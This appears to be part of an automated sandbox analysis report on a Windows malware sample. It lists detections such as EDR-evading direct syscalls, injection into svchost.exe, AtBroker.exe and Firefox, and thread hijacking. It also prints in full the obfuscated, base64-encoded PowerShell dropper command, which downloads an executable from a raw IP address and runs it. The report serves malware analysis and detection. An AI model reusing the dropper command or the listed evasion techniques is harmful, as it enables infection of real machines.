                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2D6AA mov eax, dword ptr fs:[00000030h]13_2_03A2D6AA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A276B2 mov eax, dword ptr fs:[00000030h]13_2_03A276B2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A276B2 mov eax, dword ptr fs:[00000030h]13_2_03A276B2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A276B2 mov eax, dword ptr fs:[00000030h]13_2_03A276B2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A666B0 mov eax, dword ptr fs:[00000030h]13_2_03A666B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB368C mov eax, dword ptr fs:[00000030h]13_2_03AB368C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB368C mov eax, dword ptr fs:[00000030h]13_2_03AB368C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB368C mov eax, dword ptr fs:[00000030h]13_2_03AB368C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB368C mov eax, dword ptr fs:[00000030h]13_2_03AB368C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A34690 mov eax, dword ptr fs:[00000030h]13_2_03A34690
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A34690 mov eax, dword ptr fs:[00000030h]13_2_03A34690
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC36EE mov eax, dword ptr fs:[00000030h]13_2_03AC36EE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC36EE mov eax, dword ptr fs:[00000030h]13_2_03AC36EE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC36EE mov eax, dword ptr fs:[00000030h]13_2_03AC36EE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC36EE mov eax, dword ptr fs:[00000030h]13_2_03AC36EE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC36EE mov eax, dword ptr fs:[00000030h]13_2_03AC36EE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC36EE mov eax, dword ptr fs:[00000030h]13_2_03AC36EE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5D6E0 mov eax, dword ptr fs:[00000030h]13_2_03A5D6E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5D6E0 mov eax, dword ptr fs:[00000030h]13_2_03A5D6E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A636EF mov eax, dword ptr fs:[00000030h]13_2_03A636EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]13_2_03AAE6F2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]13_2_03AAE6F2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]13_2_03AAE6F2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]13_2_03AAE6F2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB06F1 mov eax, dword ptr fs:[00000030h]13_2_03AB06F1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB06F1 mov eax, dword ptr fs:[00000030h]13_2_03AB06F1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AED6F0 mov eax, dword ptr fs:[00000030h]13_2_03AED6F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]13_2_03A6A6C7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]13_2_03A6A6C7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]13_2_03A3B6C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]13_2_03A3B6C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]13_2_03A3B6C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]13_2_03A3B6C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]13_2_03A3B6C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]13_2_03A3B6C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF16CC mov eax, dword ptr fs:[00000030h]13_2_03AF16CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF16CC mov eax, dword ptr fs:[00000030h]13_2_03AF16CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF16CC mov eax, dword ptr fs:[00000030h]13_2_03AF16CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF16CC mov eax, dword ptr fs:[00000030h]13_2_03AF16CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEF6C7 mov eax, dword ptr fs:[00000030h]13_2_03AEF6C7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A616CF mov eax, dword ptr fs:[00000030h]13_2_03A616CF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4E627 mov eax, dword ptr fs:[00000030h]13_2_03A4E627
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F626 mov eax, dword ptr fs:[00000030h]13_2_03A2F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F626 mov eax, dword ptr fs:[00000030h]13_2_03A2F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F626 mov eax, dword ptr fs:[00000030h]13_2_03A2F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F626 mov eax, dword ptr fs:[00000030h]13_2_03A2F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F626 mov eax, dword ptr fs:[00000030h]13_2_03A2F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F626 mov eax, dword ptr fs:[00000030h]13_2_03A2F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F626 mov eax, dword ptr fs:[00000030h]13_2_03A2F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F626 mov eax, dword ptr fs:[00000030h]13_2_03A2F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F626 mov eax, dword ptr fs:[00000030h]13_2_03A2F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A66620 mov eax, dword ptr fs:[00000030h]13_2_03A66620
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B05636 mov eax, dword ptr fs:[00000030h]13_2_03B05636
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A68620 mov eax, dword ptr fs:[00000030h]13_2_03A68620
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3262C mov eax, dword ptr fs:[00000030h]13_2_03A3262C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A61607 mov eax, dword ptr fs:[00000030h]13_2_03A61607
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AAE609 mov eax, dword ptr fs:[00000030h]13_2_03AAE609
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6F603 mov eax, dword ptr fs:[00000030h]13_2_03A6F603
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4260B mov eax, dword ptr fs:[00000030h]13_2_03A4260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4260B mov eax, dword ptr fs:[00000030h]13_2_03A4260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4260B mov eax, dword ptr fs:[00000030h]13_2_03A4260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4260B mov eax, dword ptr fs:[00000030h]13_2_03A4260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4260B mov eax, dword ptr fs:[00000030h]13_2_03A4260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4260B mov eax, dword ptr fs:[00000030h]13_2_03A4260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4260B mov eax, dword ptr fs:[00000030h]13_2_03A4260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A33616 mov eax, dword ptr fs:[00000030h]13_2_03A33616
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A33616 mov eax, dword ptr fs:[00000030h]13_2_03A33616
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72619 mov eax, dword ptr fs:[00000030h]13_2_03A72619
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF866E mov eax, dword ptr fs:[00000030h]13_2_03AF866E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF866E mov eax, dword ptr fs:[00000030h]13_2_03AF866E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6A660 mov eax, dword ptr fs:[00000030h]13_2_03A6A660
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6A660 mov eax, dword ptr fs:[00000030h]13_2_03A6A660
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A69660 mov eax, dword ptr fs:[00000030h]13_2_03A69660
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A69660 mov eax, dword ptr fs:[00000030h]13_2_03A69660
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A62674 mov eax, dword ptr fs:[00000030h]13_2_03A62674
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4C640 mov eax, dword ptr fs:[00000030h]13_2_03A4C640
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_000680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,12_2_000680A9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0003A124 SetUnhandledExceptionFilter,12_2_0003A124
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0003A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0003A155

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell decode and execute
                  Source: Yara matchFile source: amsi32_7716.amsi.csv, type: OTHER
                  Found direct / indirect Syscall (likely to bypass EDR)
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtCreateFile: Direct from: 0x77752FECJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtOpenFile: Direct from: 0x77752DCCJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtSetInformationThread: Direct from: 0x777463F9Jump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtQueryInformationToken: Direct from: 0x77752CACJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtTerminateThread: Direct from: 0x77752FCCJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtProtectVirtualMemory: Direct from: 0x77752F9CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtSetInformationProcess: Direct from: 0x77752C5CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtNotifyChangeKey: Direct from: 0x77753C2CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtOpenKeyEx: Direct from: 0x77752B9CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtOpenSection: Direct from: 0x77752E0CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtProtectVirtualMemory: Direct from: 0x77747B2EJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtAllocateVirtualMemory: Direct from: 0x777548ECJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtQueryVolumeInformationFile: Direct from: 0x77752F2CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtQuerySystemInformation: Direct from: 0x777548CCJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtAllocateVirtualMemory: Direct from: 0x77752BECJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtDeviceIoControlFile: Direct from: 0x77752AECJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtCreateUserProcess: Direct from: 0x7775371CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtWriteVirtualMemory: Direct from: 0x7775490CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtQueryInformationProcess: Direct from: 0x77752C26Jump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtResumeThread: Direct from: 0x77752FBCJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtCreateKey: Direct from: 0x77752C6CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtReadVirtualMemory: Direct from: 0x77752E8CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtSetInformationThread: Direct from: 0x77752B4CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtQueryAttributesFile: Direct from: 0x77752E6CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtAllocateVirtualMemory: Direct from: 0x77753C9CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtClose: Direct from: 0x77752B6C
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtUnmapViewOfSection: Direct from: 0x77752D3CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtCreateMutant: Direct from: 0x777535CCJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtWriteVirtualMemory: Direct from: 0x77752E3CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtMapViewOfSection: Direct from: 0x77752D1CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtResumeThread: Direct from: 0x777536ACJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtReadFile: Direct from: 0x77752ADCJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtQuerySystemInformation: Direct from: 0x77752DFCJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtDelayExecution: Direct from: 0x77752DDCJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtAllocateVirtualMemory: Direct from: 0x77752BFCJump to behavior
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\AppData\Roaming\igcc.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                  Modifies the context of a thread in another process (thread injection)
                  Source: C:\Windows\SysWOW64\AtBroker.exeThread register set: target process: 7756Jump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Roaming\igcc.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 319C008Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_000687B1 LogonUserW,12_2_000687B1
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00013B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00013B3A
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_000148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_000148D7
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00074C27 mouse_event,12_2_00074C27
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\igcc.exe "C:\Users\user\AppData\Roaming\igcc.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD004.tmp" "c:\Users\user\AppData\Local\Temp\qetstupm\CSCEF30E185BA76444FA670BC63B6F1A196.TMP"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\igcc.exe" Jump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
